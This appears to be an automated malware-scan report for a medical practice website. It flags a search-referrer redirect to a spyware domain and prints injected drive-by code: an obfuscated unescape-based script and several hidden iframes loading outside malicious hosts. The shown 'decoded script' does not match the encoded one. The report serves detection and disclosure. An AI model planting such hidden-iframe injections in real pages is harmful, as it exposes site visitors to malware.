Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://dvyoungmd.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: dvyoungmd.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 17 Sep 2014 17:16:25 GMT Location: http://www.spyware-systems.info/0/go.php?sid=2 Server: Apache Content-Length: 230 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://dvyoungmd.com/ | 200 OK Content-Length: 3100 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape('%3C')+unescape('%69%66%72%61')+unescape('%6D')+unescape('%65%20%73%72')+unescape('%63')+unescape('%3D%27')+unescape('%68%74%74%70')+unescape('%3A%2F')+unescape('%2F%6E%61%66')+unescape('%66%73')+unescape('%64%61%73%2E')+unescape('%63%6F%6D')+unescape('%2F%6E%65%6F')+unescape('%6E%2F')+unescape('%6E%65')+unescape('%6F%6E')+unescape('%2F%69%6E%64')+unescape('%65')+unescape('%78%2E%70')+unescape('%68%70%27')+unescape('%20')+unescape('%77%69')+unescape('%64%74%68')+unescape('%3D')+unescape('%31%20%68')+unescape('%65%69')+unescape('%67%68%74')+unescape('%3D%31%20')+unescape('%73%74%79%6C')+unescape('%65')+unescape('%3D%27')+unescape('%76%69')+unescape('%73%69%62')+unescape('%69%6C%69')+unescape('%74%79')+unescape('%3A%68%69')+unescape('%64%64%65')+unescape('%6E%27')+unescape('%3E%3C%2F')+unescape('%69%66%72')+unescape('%61')+unescape('%6D%65%3E')+''); Decoded script: <SCRIPT>window.status='Done';document.write('<iframe name=4 src=\'http://art-kyiv.com/stds/go.php?sid=4?'+Math.round(Math.random()*166581)+'d8ba468b8\' width=669 height=249 style=\'display: none\'></iframe>')</SCRIPT> Antivirus reports:
Malicious iFrame found. size: 196x104 style: hidden src: http://shopfilmlifescience.cn:8080/index.php This URL is marked by Google as suspicious <iframe src="http://shopfilmlifescience.cn:8080/index.php" width=196 height=104 style="visibility: hidden"> | ||
http://dvyoungmd.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dvyoungmd.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://dvyoungmd.com/
Result: dvyoungmd.com is not infected or malware details are not published yet.
Result: dvyoungmd.com is not infected or malware details are not published yet.